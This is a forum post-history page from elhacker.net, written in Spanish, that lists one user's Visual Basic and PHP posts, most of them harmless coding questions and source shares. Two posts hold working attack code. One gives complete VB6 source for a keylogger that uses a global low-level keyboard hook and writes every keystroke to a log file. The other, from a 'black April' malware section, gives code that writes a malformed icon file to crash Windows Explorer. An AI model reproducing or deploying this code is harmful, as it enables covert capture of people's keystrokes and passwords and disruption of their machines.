elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Temas
Páginas: 1 2 3 4 [5] 6 7 8 9 10
41  Programación / Programación Visual Basic / Desbordamiento en: 1 Noviembre 2009, 02:27 am
buenas estoy teniendo un problema con lo siguiente

Código:
Private Sub Form_Load()

    Dim a As Double
    Dim b As Double
   
    a = 4195038069#
    b = &HF0F
   
    Debug.Print a And b

End Sub

esto me esta dando un error 6 Desbordamiento

estoy intentando pasar una funcion de PHP a visual basic, en PHP no da error y me imprime como resultado "773"  probe esto mismo en la calculadora de windows y tambien "773"
ahora no se porque visual basic no permite esta operaciones.
abra una forma de realizar la operación.?¿?

Saludos
42  Programación / Programación Visual Basic / Keylogger (Otro metodo) en: 18 Agosto 2009, 06:58 am
Hola ya que viene la racha con los Keylogger, pongo otro método, ayer mirando el tuto de Karcrack supuse que tendría que haber otra forma de transladar las teclas, así que se me dió por pasarles los msg del hook a una ventana de tipo EDIT (WM_IME_KEYDOWN), y el resultado fue bastante bueno, inclusive toma las @ y símbolos especiales, excepto los acentos porque si se los dejaba no los agrega a la ventana donde escribía.

Seria bueno que si alguien tiene un teclado inglés lo pruebe a ver si funciona todo bien.

Código
  1. Option Explicit
  2. '------------------------------------
  3. 'Autor:   Leandro Ascierto
  4. 'Web:     www.leandroascierto.com.ar
  5. 'Fecha:   18-08-09
  6. 'En base a tutorial de Karcrack
  7. '------------------------------------
  8. Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
  9. Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long
  10. Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long
  11. Private Declare Function PostMessage Lib "user32.dll" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  12. Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
  13. Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  14. Private Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
  15. Private Declare Function SetWindowText Lib "user32.dll" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
  16. Private Declare Function CreateWindowEx Lib "user32.dll" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, ByRef lpParam As Any) As Long
  17. Private Declare Function DestroyWindow Lib "user32.dll" (ByVal hwnd As Long) As Long
  18.  
  19. Private Const ES_MULTILINE              As Long = &H4&
  20. Private Const ES_AUTOVSCROLL            As Long = &H40&
  21. Private Const ES_AUTOHSCROLL            As Long = &H80&
  22.  
  23. Private Const WM_IME_KEYDOWN            As Long = &H290
  24. Private Const WM_SYSKEYDOWN             As Long = &H104
  25. Private Const WM_KEYDOWN                As Long = &H100
  26. Private Const WM_KEYUP                  As Long = &H101
  27. Private Const WH_KEYBOARD_LL            As Long = 13
  28.  
  29. Private Const BUFFER_TO_SAVE            As Long = 100
  30.  
  31. Private hEdit                           As Long
  32. Private KBHook                          As Long
  33. Private sTextData                       As String
  34. Private TextLen                         As Long
  35.  
  36.  
  37. Public Sub ManageKeylogger(ByVal Enable As Boolean)
  38.    Select Case Enable
  39.        Case True
  40.            hEdit = CreateWindowEx(0, "EDIT", "", ES_MULTILINE Or ES_AUTOVSCROLL Or ES_AUTOHSCROLL, 0, 0, 0, 0, 0, 0, App.hInstance, 0)
  41.            KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)
  42.            Debug.Print hEdit
  43.        Case False
  44.            Call UnhookWindowsHookEx(KBHook)
  45.            TextLen = GetWindowTextLength(hEdit)
  46.            If TextLen Then LogToFile App.Path & "\Log.txt"
  47.            DestroyWindow hEdit
  48.    End Select
  49. End Sub
  50.  
  51.  
  52. Private Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
  53.  
  54.    Select Case wParam
  55.  
  56.        Case WM_KEYDOWN
  57.            If lParam <> 222 And lParam <> 186 Then
  58.                Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)
  59.            End If
  60.  
  61.        Case WM_KEYUP
  62.            TextLen = GetWindowTextLength(hEdit)
  63.            If TextLen > BUFFER_TO_SAVE Then
  64.                LogToFile App.Path & "\Log.txt"
  65.            End If
  66.  
  67.        Case WM_SYSKEYDOWN
  68.            Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)
  69.  
  70.    End Select
  71.  
  72. End Function
  73.  
  74.  
  75. Private Sub LogToFile(ByVal sPath As String)
  76.  
  77.    sTextData = String(TextLen + 1, Chr$(0))
  78.    GetWindowText hEdit, sTextData, TextLen + 1
  79.    SetWindowText hEdit, vbNullString
  80.  
  81.    Open sPath For Append As #1
  82.        Print #1, sTextData
  83.    Close #1
  84.  
  85. End Sub
  86.  
  87.  

 Saludos.


43  Programación / Programación Visual Basic / Iconos que detallan el tipo de fuente en: 21 Julio 2009, 20:51 pm
Hola una consulta,quizas no tiene que ver mucho con vb pero es para aplicarlo, tengo una duda que significan los iconos que estan al lado de las fuente, cual es la relacion? en algunos programas me muestran todas "O" en otros todas "T" y tambien estan las "A" alguien sabe el significados de estos iconos??



Saludos
44  Programación / Programación Visual Basic / ListBoxEx [Source] en: 14 Julio 2009, 07:31 am
Hola, si me permite hago un poco de Spam a cambio de un aporte, es para compartir este Control de Usuario, se trata de un ListBox personalizado el cual permite insertar iconos, Cambiar la seleción, un sistema de desplazamiento personalizado. etc.





Descargar

Espero a nadie le moleste  ;)
Saludos
45  Programación / Programación Visual Basic / Listar Ventanas, problemas con IDEOwner en: 12 Mayo 2009, 08:09 am
hola, tengo un problema con este codigo, estoy listando todas las ventanas que aparecen en la barra de Tareas, y cuando le doy clic en el list me imprime la ventana, pero el problema es con el IDE de visual basic si no esta minimizado, el problema es que la ventana se llama wndclass_desked_gsk pero la que en realidad el que tiene el ExStyle WS_EX_APPWINDOW es IDEOwner como puedo obtener la ventana wndclass_desked_gsk  a partir de IDEOwner


en un modulo
Código:
Option Explicit
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Private Declare Function GetParent Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function IsWindowVisible Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function GetDesktopWindow Lib "user32" () As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Public Declare Function PrintWindow Lib "user32.dll" (ByVal hWnd As Long, ByVal hdcBlt As Long, ByVal nFlags As Long) As Long

Private Const GWL_EXSTYLE As Long = -20
Private Const WS_EX_APPWINDOW As Long = &H40000
Private Const WS_EX_WINDOWEDGE As Long = &H100&

Dim arr() As Long

Public Function fEnumWindows() As Variant
    ReDim arr(0)
    Call EnumWindows(AddressOf fEnumWindowsCallBack, GetDesktopWindow)
    fEnumWindows = arr
End Function

Private Function fEnumWindowsCallBack(ByVal hWnd As Long, ByVal lParam As Long) As Long
    If IsWindowVisible(hWnd) Then
        If IsExStyle(hWnd, WS_EX_APPWINDOW) Or GetWinClassName(hWnd) = "CabinetWClass" Then
            arr(UBound(arr)) = hWnd
            ReDim Preserve arr(UBound(arr) + 1)
        End If
    End If
fEnumWindowsCallBack = True
End Function

Public Function GetWinText(ByVal hWnd As Long)
    Dim MyStr As String
    MyStr = String(100, Chr$(0))
    GetWindowText hWnd, MyStr, 100
    GetWinText = Left$(MyStr, InStr(MyStr, Chr$(0)) - 1)
End Function

Public Function GetWinClassName(hWnd As Long) As String
    Dim lpClassName As String
    Dim Ret As Long
    lpClassName = Space(256)
    Ret = GetClassName(hWnd, lpClassName, 256)
    GetWinClassName = Left$(lpClassName, Ret)
End Function

Private Function IsExStyle(hWnd As Long, ExStyle As Long) As Boolean
    IsExStyle = (GetWindowLong(hWnd, GWL_EXSTYLE) And ExStyle) = ExStyle
End Function


en un formulario con un picture1 y un list1
Código:
Option Explicit
Dim MyArr() As Long
'wndclass_desked_gsk
'IDEOwner
Private Sub Form_Load()
    Dim i As Long
   
    MyArr = fEnumWindows
   
    For i = 0 To UBound(MyArr) - 1
        List1.AddItem GetWinText(MyArr(i))
    Next
End Sub

Private Sub List1_Click()
    Picture1.Cls
    PrintWindow MyArr(List1.ListIndex), Picture1.hDC, 0
    Me.Caption = GetWinClassName(MyArr(List1.ListIndex))
End Sub

Creo que deberia utlizar GetWindowThreadProcessId pero no encotre forma de hacerlo.

Saludos

46  Programación / Programación Visual Basic / Skin para tus formularios [Source] en: 19 Abril 2009, 21:38 pm
Buenas este es un modulo clase para aplicar Skin a nuestros formularios, anteriormente habia hecho algo similar pero tenia ciertas limitaciones, bien en esta versión se corrige esos problemas. en el link tambien esta el Editor para poder crear sus propios skin, yo por el momento pude crear estos 16.

47  Seguridad Informática / Abril negro / Explorer crash [Abril Negro] en: 16 Abril 2009, 05:07 am
Hola este es un pequeño fuente para crashear el explorer,no es nada del otro mundo, creo que esto es algo viejo pero tenia entendido con con SP3 no funcionaba,bueno a ami porlomenso me casca el explorer y tengo SP3.

Código:
Option Explicit
Dim Arr(62) As Byte

Private Sub Form_Load()

Arr(2) = 1: Arr(4) = 1: Arr(12) = 32: Arr(14) = 40
Arr(18) = 22: Arr(22) = 40: Arr(34) = 1: Arr(36) = 32

Open "C:\caca.ico" For Binary As #1
    Put #1, , Arr
Close #1

End Sub

al ejecutarlo despues cuando abran la carpeta en disco C:\ explota el explorer

lo que hace crea una falsa imagen (en este caso es .ico pero puede ser cualquier otro formato) y inserta unos bits que probocan un error en el explorer al intentar obtener los datos de esta.

Para eliminar esta imagen, Ejecutar > CMD > Del C:\caca.ico


Saludos

a por las dudas el codigo es en Visual Basic

aca un ejemplo comprimido de la imagen

la vajan y la descomprimen
48  Programación / PHP / Xml o Expreción Regular? en: 24 Marzo 2009, 22:13 pm
Hola disculpen si esta pregunta no corresponde a esta parte del foro, pero no se bien que si es de xml o no.

tengo que interpretar los siguiente para poder separar en items la siguentes lineas
bien mi duda es esto es XML o es exprecion regular?

caso 1
Código:
["casa",["Casa","CASA","Casa (desambiguacion)","Casa (desambiguaci\u00f3n)","Casa (linaje)","CASA 101","CASA 2.111","CASA 207 Azor","CASA 2111","CASA 212"]]
caso 2
Código:
window.google.ac.h(["casa",[["casa del libro","2.280.000 resultados","0"],["casas","107.000.000 resultados","1"],["casas rurales","8.810.000 resultados","2"],["casas prefabricadas","831.000 resultados","3"],
["casa blanca","20.500.000 resultados","4"],["casas de madera","1.300.000 resultados","5"],["casas en venta","5.470.000 resultados","6"],["casa royal","3.330.000 resultados","7"],["casas ara","12.800.000 resultados","8"],["casa rural","6.080.000 resultados","9"]]])
caso 3
Código:
["casa",["casablanca","casanova","casa impian","casa grande","casa del mar","casa loma","casa de campo","casa bonita","casa 106.7","casa manana"],[],[]]
 

Saludos
49  Programación / Programación Visual Basic / [Source] Video Escritorio en: 24 Marzo 2009, 01:46 am
Hola bueno, ya anteriormente se había puesto este código con algunas modificaciones de ░▒▓BlackZeroҖ▓▒░ usando MCI  pero bien, a mi tampoco me estaba funcionando bien, ya que no se ocultaba la ventana del video, así que decidí hacerlo sobre un formulario creo que debería andar bien, además le puse un ícono junto al reloj para poder Cargar una pelicula, Play, Stop, Silencio y Salir, y bien al salir restablece el fondo de pantalla.

Está lindo para cargar algún video de un acuario o paisaje para animar el escritorio, no pongo capturas porque no se puede.

Descargar Codigo

Saludos
50  Programación / Programación Visual Basic / Autocompletar Sugerencias en Text box [Source] en: 22 Marzo 2009, 20:23 pm
Bueno Edito viejo post porque le hice unas reformas al proyecto de autocompletar, ahora cuenta con cuatro buscadores Google, Yahoo, Youtube y Wikipedia.
como comente anteriormente, lo que hace este modulo es autocompletar a un textbox con las sugencias de estos buscadores



Descargar codigo
Páginas: 1 2 3 4 [5] 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines